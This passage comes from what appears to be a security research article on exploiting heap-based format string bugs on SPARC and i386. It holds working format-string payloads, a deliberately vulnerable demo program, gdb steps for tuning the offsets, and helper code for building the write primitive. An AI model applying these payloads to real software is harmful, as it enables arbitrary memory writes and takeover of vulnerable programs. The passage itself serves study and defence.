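            mem.w16(ptr, count)
    return count

STACK, TARGET, VALUE = 0x30000, 0x29e8c, 0xbeef
mem = Mem(0x40000)
mem.w32(STACK + 4 * 14, STACK + 4 * 17)        # fp -> frame 1

ops = [("pad", TARGET), ("n", 15),             # frame 1's l0 = TARGET
       ("pad", (VALUE - TARGET) % 0x10000), ("hn", 18)]
run(mem, STACK, ops)
print(hex(mem.r32(STACK + 4 * 17)), hex(mem.r16(TARGET)))
```

  Since the target is a low address, a single '%n' is enough to build
the pointer here, as in example 4.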

--[ 9. the i386 stack 

  We can also exploit heap based format strings on the i386 architecture
using a very similar technique. Let's see how the i386 stack works.

        frame 0        frame 1        frame 2        frame 3
       [  ebp  ] ---> [  ebp  ] ---> [  ebp  ] ---> [  ebp  ]
       [       ]      [       ]      [       ]      [       ]
       [       ]      [       ]      [       ]      [       ]
       [ ...   ]      [ ...   ]      [ ...   ]      [ ...   ]

  As you can see, i386's stack is very similar to SPARC's, the main
difference is that all the addresses are stored in little-endian format.

         frame0           frame1
        [ LSB | MSB ] ---> [ LSB | MSB ] 
        [           ]      [           ] 

  So, the trick we were using in SPARC of overwriting address's LSB
with '%n', and then overwriting its MSB with '%hn' with just one pointer
won't work in this architecture.
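
  The difference is easy to see on a 4 byte cell. The sketch below
(store() and build() are made-up helpers) writes 0x1234 with a 4 byte
store, as '%n' would, and then 0x2000 with a 2 byte store, as '%hn'
would, for both byte orders:

```python
import struct

def store(cell, offset, fmt, value):
    packed = struct.pack(fmt, value)
    cell[offset:offset + len(packed)] = packed

def build(order, hn_offset):
    """'%n' writing 0x1234 at offset 0, then '%hn' writing 0x2000 at
    'hn_offset', with the given byte order ('<' or '>')."""
    cell = bytearray(4)
    store(cell, 0, order + "I", 0x1234)
    store(cell, hn_offset, order + "H", 0x2000)
    return struct.unpack(order + "I", bytes(cell))[0]

print(hex(build(">", 0)))   # SPARC, one pointer
print(hex(build("<", 0)))   # i386, same pointer: low half clobbered
print(hex(build("<", 2)))   # i386, second pointer to address+2
```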

  We need an additional pointer, pointing to MSB's address, in order to
change it. Something like this:

                    +----------------------------+
                    |                            |
                    |                            V
       [LSB | MSB]  |   [LSB | MSB] ---> [LSB | MSB]
       [         ]  |   [         ]      [         ]
       [         ] -+   [         ]      [         ]
       [  ...    ]      [   ...   ]      [   ...   ]
         Frame B          Frame C          Frame D

  Heh! as you probably guessed, this is not very common on everyday stacks,
so, what we are going to do, is build the pointers we need, and then, of
course, use them.

  Warning! We just found out that this technique does not work on latest
Linuxes, we are not even sure if it works on any (it depends on the
libc/glibc version), but we know it works, at least, on OpenBSD, FreeBSD
and Solaris x86.

--[ 9.1. example 6

  This trick will need an additional frame... later we'll try to get rid
of as many frames as possible.
  
                                 +----------------------------+
                                 |                            |
                                 |                            V
   [LSB | MSB] ---> [LSB | MSB] -+   [LSB | MSB] ---> [LSB | MSB]
   [         ]      [         ]      [         ]      [         ]
   [         ]      [         ]      [         ]      [         ]
   [  ...    ]      [  ...    ]      [   ...   ]      [   ...   ]
     Frame A          Frame B          Frame C          Frame D

  Frame A has a pointer to Frame B. Specifically, it's pointing to Frame
 B's ebp. So we can modify the LSB of Frame B's ebp with an '%hn'. And that
 is what we wanted! Now Frame B is not pointing to Frame C, but to the MSB
 of Frame D's ebp.

  We are abusing the fact that ebp is already pointing to the stack, and we
assume that changing its 2 LSB will be enough to make it point to another
frame's saved ebp. There may be some problems with this (if Frame D is
not on the same 64k "segment" of Frame C), but we'll get rid of this
problem in the following examples.

  So with 4 stack frames, we could build one pointer in the stack, and with
that pointer we could write 2 bytes anywhere in memory. If we have 8 stack
frames we could repeat the process and build 2 pointers in the stack,
allowing us to write 4 bytes anywhere in memory.
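
  The 64k "segment" caveat can be checked with a couple of lines. This is
 only a sketch, and the names same_64k and low_half_for are invented here:
 a 2-byte write to the low half of a saved ebp leaves its upper 16 bits
 alone, so the new target must share them.

```c
#include <stdint.h>

/* True if a write to the low 16 bits of `cur` can turn it into `target`,
 * i.e. both addresses share their upper 16 bits. */
int same_64k(uint32_t cur, uint32_t target) {
    return (cur >> 16) == (target >> 16);
}

/* Value to write with %hn so that `cur` becomes `target`,
 * or -1 if the target lies in another 64k "segment". */
long low_half_for(uint32_t cur, uint32_t target) {
    return same_64k(cur, target) ? (long)(target & 0xffffu) : -1L;
}
```

  If low_half_for() gives -1, this example's trick can't reach that frame
 with a single '%hn'.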

--[ 9.2. example 7 - the pointer generator

  There are cases where you don't have 8 (or 4) stack frames. What can we
do then? Well, using direct parameter access, we could use just 3 stack
frames to do everything, and not only a 4-bytes-write-anything-anywhere
primitive but almost a full write-anything-anywhere primitive.

  Let's see how we can do it, heavily abusing direct parameter access.
 Our target? To build the address 0xdfbfddf0 in the stack, so we can use it
 later with another %hn to write there.

step 1:

  Frame B's saved frame pointer (saved ebp) is already pointing to Frame
 C's saved ebp, so, the first thing we are going to do is change the LSB of
 Frame C's saved ebp:

         [ LSB | MSB ] ---> [ LSB | MSB ] ---> [ LSB | MSB ]
         [           ]      [           ]      [           ]
         [           ]      [           ]      [           ]
         [   ...     ]      [    ...    ]      [    ...    ]
            Frame A            Frame B            Frame C
  
  Since we know where in the stack is Frame B, we could use direct
 parameter access to access parameters out of order... and probably not
 just once. Later we'll see how to find the direct parameter access number
 we need, right now let's just assume Frame B's is 14.

                 # step 1
    '%.56816u' + # change the length (we want to write 0xddf0)
    '%14$hn'   + # Write where argument 14 is pointing
                 # (arg 14 is Frame B's ebp)

  What we get is a modified Frame C's ebp.

step 2:
         [ LSB | MSB ] ---> [ LSB | MSB ] ---> [ ddf0| MSB ]
         [           ]      [           ]      [           ]
         [           ]      [           ]      [           ]
         [   ...     ]      [    ...    ]      [    ...    ]
            Frame A            Frame B            Frame C

  As Frame A's ebp is already pointing to Frame B's ebp, we can use it to
 change the LSB of Frame B's ebp. Frame B's ebp is already pointing to the
 LSB of Frame C's ebp, so we can make it point to the MSB of Frame C's ebp
 instead. We won't have the 64k segments problem this time: the LSB and the
 MSB of Frame C's ebp must be in the same segment, as the saved ebp is
 always 4 bytes aligned... I know it's confusing...
  For example, if Frame C's ebp is at 0xdfbfdd6c, we will want to make
 Frame B's ebp point to 0xdfbfdd6e, so we can write the target address' MSB.

                # step 2
    '%.65406u'+ # we want to write 0xdd6e (65406 = 0x1dd6e-0xddf0)
    '%6$hn'   + # Write where argument 6 is pointing
                # (assuming arg 6 is Frame A's ebp)

step 3:
                                            +----------+
                                            |          V
         [ LSB | MSB ] ---> [ dd6e| MSB ] --+  [ ddf0| MSB ]
         [           ]      [           ]      [           ]
         [           ]      [           ]      [           ]
         [   ...     ]      [    ...    ]      [    ...    ]
            Frame A            Frame B            Frame C


  The new Frame B points to the MSB of the Frame C's ebp. And now, with 
another direct parameter access, we build the MSB of the address that we
were looking for.

                # step 3
    '%.593u'  + # we want to write 0xdfbf (593 = 0xdfbf - 0xdd6e)
    '%14$hn'  + # Write where argument 14 is pointing
                # (arg 14 is Frame B's ebp)


our result:
                                            +----------+
                                            |          V
         [ LSB | MSB ] ---> [ dd6e| MSB ] --+  [ ddf0| dfbf]
         [           ]      [           ]      [           ]
         [           ]      [           ]      [           ]
         [   ...     ]      [    ...    ]      [    ...    ]
            Frame A            Frame B            Frame C


  As you can see, we have our pointer in Frame C's ebp, now we could use it
to write 2 bytes anywhere in memory. This won't be enough normally to make
an exploit, but we could use the same trick, USING THESE 3 STACK FRAMES
AGAIN, to build another pointer (and another, and another...)
Hey, we've found a pointer generator :-) with only 3 stack frames.
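
  The pad widths used in steps 1 to 3 all come from the same arithmetic:
 '%hn' stores the low 16 bits of the number of chars printed so far, so
 each step only has to print the difference, modulo 0x10000. A small
 sketch (pad_for and emit_step are names invented for this illustration):

```c
#include <stdint.h>
#include <stdio.h>

/* Chars still to print so that the low 16 bits of printf's running
 * output count go from `printed` to `want`. Result is in 0..65535. */
unsigned pad_for(unsigned printed, uint16_t want) {
    return ((unsigned)want - (printed & 0xffffu)) & 0xffffu;
}

/* Write "%.<pad>u%<argno>$hn" into out. Returns what snprintf()
 * returns: the length of the generated directive. */
int emit_step(char *out, size_t len, unsigned pad, int argno) {
    return snprintf(out, len, "%%.%uu%%%d$hn", pad, argno);
}
```

  Starting from 0 chars printed and asking for 0xddf0, 0xdd6e and 0xdfbf in
 turn gives 56816, 65406 and 593, the widths shown in the steps. Beware of
 very small results: '%.Nu' prints at least all the digits of the argument
 it consumes, so a pad shorter than that number (up to 10 digits for a
 32-bit value) will not come out exact.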

  Got the theory? let's put all this together in an example.

  The following code will use 3 frames (A,B,C) and multiple parameters
access to write the value 0xaabbccdd to the address 0xdfbfddf0. It was
tested on an OpenBSD 3.0, and can be tried on other systems.  We'll show
you here how to tune it to your box.

  /* fs2.c                                                   *
   * demo program to show format strings techniques          *
   * specially crafted to feed your brain by gera@corest.com */

  #include <stdio.h>
  #include <string.h>

  void do_printf(char *msg) {
    printf(msg);                  // the bug: msg is used as the format
  }

  #define FrameC 0xdfbfdd6c
  // chars to print so the low 16 bits of the output count reach x
  #define counter(x)      ((a=(x)-b),(a+=(a<0?0x10000:0)),(b=(x)),a)

  char *write_two_bytes(
      unsigned long where,
      unsigned short what,
      int restoreFrameB)
  {
    static char buf[1000]={0};    // enough? sure! :)
    static int a,b=0;
    char *p = buf + strlen(buf);  // append (sprintf(buf,"%s",buf) overlaps)

    if (restoreFrameB)
      p += sprintf(p, "%%.%du%%6$hn" , counter((FrameC & 0xffff)));
    p += sprintf(p, "%%.%du%%14$hn", counter(where & 0xffff));
    p += sprintf(p, "%%.%du%%6$hn" , counter((FrameC & 0xffff) + 2));
    p += sprintf(p, "%%.%du%%14$hn", counter(where >> 0x10));
    p += sprintf(p, "%%.%du%%29$hn", counter(what));
    return buf;
  }

  int main() {
    char *buf;
    buf = write_two_bytes(0xdfbfddf0,0xccdd,0);
    buf = write_two_bytes(0xdfbfddf2,0xaabb,1);
    do_printf(buf);
    return 0;
  }

  The values you'll need to change are:

    %6$         number of parameter for Frame A's ebp
    %14$        number of parameter for Frame B's ebp
    %29$        number of parameter for Frame C's ebp
    0xdfbfdd6c  address of Frame C's ebp

  To get the right values:

gera@vaiolent> cc -o fs fs.c
gera@vaiolent> gdb fs
(gdb) br do_printf
(gdb) r
(gdb) disp/i $pc
(gdb) ni
(gdb) p "run until you get to the first call in do_printf"
(gdb) ni
1: x/i $eip  0x17a4 <do_printf+12>:     call   0x208c <_DYNAMIC+140>
(gdb) bt
#0  0x17a4 in do_printf ()
#1  0x1968 in main ()
(gdb) x/40x $sp
0xdfbfdcf8:     0x000020d4      0xdfbfdd70      0xdfbfdd00      0x0000195f
0xdfbfdd08:     0xdfbfddf2      0x0000aabb     [0xdfbfdd30]--+ (0x00001968)
0xdfbfdd18:     0x000020d4      0x0000ccdd      0x00000000   |  0x00001937
0xdfbfdd28:     0x00000000      0x00000000   +-[0xdfbfdd6c]<-+  0x0000109c
0xdfbfdd38:     0x00000001      0xdfbfdd74   |  0xdfbfdd7c      0x00002000
0xdfbfdd48:     0x0000002f      0x00000000   |  0x00000000      0xdfbfdff0
0xdfbfdd58:     0x00000000      0x0005a0c8   |  0x00000000      0x00000000
0xdfbfdd68:     0x00002000     [0x00000000]<-+  0x00000001      0xdfbfddd4
0xdfbfdd78:     0x00000000      0xdfbfddeb      0xdfbfde04      0xdfbfde0f
0xdfbfdd88:     0xdfbfde50      0xdfbfde66      0xdfbfde7e      0xdfbfde9e

  Ok, time to start getting the right values. First, 0x1968 (from previous
'bt' command) is where do_printf() will return after finishing, locate it
in the stack (in this example it's at 0xdfbfdd14). The previous word is
where Frame A starts, and is where Frame A's ebp is saved, here it's
0xdfbfdd30.
  Great! now we need the direct parameter access number for it, so, as we
executed up to the call, the first word in the stack is the first argument
for printf(), numbered 0. If you count, starting from 0, up to Frame A's
ebp, you'll count 6 words, that's the number we want.
  Now, locate where Frame A's ebp is pointing to, that's Frame B's ebp,
here 0xdfbfdd6c. Count again, you'll get 14, 2nd value needed. Cool, now
 Frame B's saved ebp is pointing to Frame C's ebp, so, we already have
another value: 0xdfbfdd6c. And to get the last number needed, you need to
count again, until you get to Frame C's ebp (count until you get to the
address 0xdfbfdd6c), you should get 29.
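
  If counting words by hand gets boring, the same numbers fall out of a
 subtraction. A minimal sketch, assuming 4-byte stack words and the
 numbering used here (the word at $sp, right before the call, is number 0).
 The name dpa_index is made up for this illustration:

```c
#include <stdint.h>

/* Direct parameter access number of the stack word at `addr`, counting
 * 4-byte words from `sp` (word 0). Returns -1 if addr is below sp or is
 * not word aligned relative to it. */
int dpa_index(uint32_t sp, uint32_t addr) {
    if (addr < sp || ((addr - sp) & 3u) != 0)
        return -1;
    return (int)((addr - sp) / 4u);
}
```

  With the dump above, $sp is 0xdfbfdcf8, and the words at 0xdfbfdd10,
 0xdfbfdd30 and 0xdfbfdd6c come out as 6, 14 and 29.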

  Now edit your fs.c, compile it, gdb it, and run past the call (one more
'ni'), you should see a lot of zeros and then:

(gdb) x/x 0xdfbfddf0
0xdfbfddf0:     0xaabbccdd

  Apparently it does work after all :-)
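
  If your box is one of those where the real thing refuses to work, the
 same sequence of writes can still be followed on paper, or in a toy model.
 The sketch below is NOT an exploit: it simulates a small window of the
 stack as a byte array and replays the writes fs2.c asks printf() to do.
 It assumes what the technique itself assumes, that each '%N$hn' fetches
 its pointer from the stack at the moment it is processed. The slot
 addresses are the ones from the dump above, everything else (names, window
 size) is invented for the illustration.

```c
#include <stdint.h>
#include <string.h>

#define BASE   0xdfbfdcf8u   /* lowest simulated address ($sp in the dump) */
#define SIZE   0x110u        /* bytes of simulated stack                   */
#define SLOT_A 0xdfbfdd10u   /* Frame A's saved ebp, argument 6            */
#define SLOT_B 0xdfbfdd30u   /* Frame B's saved ebp, argument 14           */
#define SLOT_C 0xdfbfdd6cu   /* Frame C's saved ebp, argument 29           */

static uint8_t sim_mem[SIZE];

/* True if the n bytes at address a fall inside the simulated window. */
int in_window(uint32_t a, uint32_t n) {
    return a >= BASE && a - BASE <= SIZE - n;
}

/* Little-endian 32-bit read; addresses outside the window read as 0. */
uint32_t rd32(uint32_t a) {
    const uint8_t *p = sim_mem + (a - BASE);
    if (!in_window(a, 4)) return 0;
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Little-endian 16-bit write; writes outside the window are dropped. */
void wr16(uint32_t a, uint16_t v) {
    if (!in_window(a, 2)) return;
    sim_mem[a - BASE]     = (uint8_t)(v & 0xff);
    sim_mem[a - BASE + 1] = (uint8_t)(v >> 8);
}

void wr32(uint32_t a, uint32_t v) {
    wr16(a, (uint16_t)(v & 0xffffu));
    wr16(a + 2, (uint16_t)(v >> 16));
}

/* Model of '%N$hn': fetch the pointer stored in `slot`, write v there. */
void hn_via(uint32_t slot, uint16_t v) {
    wr16(rd32(slot), v);
}

/* Initial chain: A -> B -> C, Frame C's saved ebp is 0 as in the dump. */
void reset_stack(void) {
    memset(sim_mem, 0, sizeof sim_mem);
    wr32(SLOT_A, SLOT_B);
    wr32(SLOT_B, SLOT_C);
}

/* Same order of writes as write_two_bytes() in fs2.c. */
void write_two_bytes_sim(uint32_t where, uint16_t what, int restore_b) {
    if (restore_b)
        hn_via(SLOT_A, (uint16_t)(SLOT_C & 0xffffu));     /* B -> C's LSB */
    hn_via(SLOT_B, (uint16_t)(where & 0xffffu));          /* C's LSB      */
    hn_via(SLOT_A, (uint16_t)((SLOT_C & 0xffffu) + 2u));  /* B -> C's MSB */
    hn_via(SLOT_B, (uint16_t)(where >> 16));              /* C's MSB      */
    hn_via(SLOT_C, what);                                 /* the write    */
}
```

  After reset_stack(), calling write_two_bytes_sim(0xdfbfddf0, 0xccdd, 0)
 and then write_two_bytes_sim(0xdfbfddf2, 0xaabb, 1) leaves 0xaabbccdd at
 the simulated 0xdfbfddf0, and Frame B's slot pointing at 0xdfbfdd6e, which
 is the broken frame chain discussed at the end of this section.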

  There are some interesting variants. In this example, printf() is not
 called from main(), but from do_printf(). This is artificial, just so
 that we have 3 frames to play with. If the printf() is directly in main(),
 you will not have three frames, but you could do just the same using argv
 and *argv, as the only real things you need are a pointer in the stack,
 pointing to another pointer in the stack pointing somewhere in the stack.

  Another interesting method (probably even more interesting than the
original), is to target not a function pointer but a return address in
stack.  This method will be a lot shorter (just 2 %hn per short to write,
and only 2 frames needed), a lot of addresses could be bruteforced at the
same time, and of course, you could use a jumpcode if you want.

  This time we'll leave the experimentation with these two variants (and
 others) to the reader.

  It is noteworthy that with this technique in i386, Frame B breaks the
 chain of the stack frames, so if the program you're exploiting needs to use
 Frame C, it will probably segfault, hence you'll need to hook the
 execution flow before the crash.

--[ 10. conclusions

--[ 10.1. is it dangerous to overwrite the l0 (on the stack frame) ?

  This is not perfect, but practice shows that you will not have many
 problems in changing the value of l0. But, should you be unlucky, you may
 prefer to modify the l0's that belong to main()'s and _start()'s stack
 frames.

--[ 10.2. is it dangerous to overwrite the ebp (on the stack frame) ?

  Yes, it's very dangerous. Probably your program will crash. But as we
saw, you can restore the original ebp value using the pointer generator :-)
 And as in the SPARC case, you may prefer to modify the ebp's that belong
 to the main(), _start(), etc., stack frames.


--[ 10.3. is this reliable ?

  If you know the state of the stack, or if you know the sizes of the stack
frames, it is reliable. Otherwise, unless the situation lets you implement
some smooth way of bruteforcing all the numbers needed, this technique
won't help you much.

  I think when you have to overwrite values that are located at addresses
 containing zero bytes, this may be your only hope, since you won't be able
 to put a zero in your format string (because it will truncate your string).
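
  Whether a given target falls in this category is easy to test. A minimal
 sketch (has_nul_byte is a name made up here) that tells if a 32-bit
 address has a zero byte in it, and so can't travel inside the format
 string itself:

```c
#include <stdint.h>

/* Returns 1 if any of the four bytes of addr is 0x00, else 0. */
int has_nul_byte(uint32_t addr) {
    int i;
    for (i = 0; i < 4; i++)
        if (((addr >> (8 * i)) & 0xffu) == 0)
            return 1;
    return 0;
}
```

  An address like 0xdfbfddf0 passes, while any low address of the form
 0x000xxxxx does not, and those are the ones where building the pointer in
 the stack pays off.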

  Also in SPARC, the binaries' PLT are located in low addresses and it is
more reliable to overwrite the binary's PLT than the libc's PLT. Why is
this so? Because, I would guess, in Solaris libc changes more frequently
than the binary that you want to exploit. And probably, the binary you want
to exploit will never change! 

--[ The End
--[ 11. more greets and thanks

  gera:

    riq, for trying every stupid idea I have and making it real!

    juliano, for being our format strings guru.

    Impact, for forcing me to spend time thinking about all these amazing
    things.

    last minute addition: I just learned of the existence of a library
    called fmtgen, Copyrighted by fish stiqz. It's a format string
    construction library, and it can be used (as suggested in its Readme),
    to write jumpcodes or even shellcodes as well as addresses. These are
    the last lines I'm adding to the article, I wish I had a little more
    time, to study it, but we are in a hurry, you know :-)

  riq:

    gera, for finding out how to exploit the heap based format strings in
    i386, for his ideas, suggestions and fixes.

    juliano, for letting me know that I can overwrite, as many times as I
    want, an address using 'direct access', and other tips about format
    strings.

    javier, for helping me in SPARC.

    bombi, for trying her best to correct my English.

    and bruce, for correcting my English, too.

--[ 12. references

[1] Exploiting Format String Vulnerabilities, scut.
    March 2001. http://www.team-teso.net/articles/formatstring

[2] w00w00 on Heap Overflows, Matt Conover (shok) and w00w00 Security Team.
    January 1999. http://www.w00w00.org/articles.html

[3] Juliano's badc0ded
    http://community.corest.com/~juliano

[4] Google the oracle.
    http://www.google.com

|=[ EOF ]=---------------------------------------------------------------=|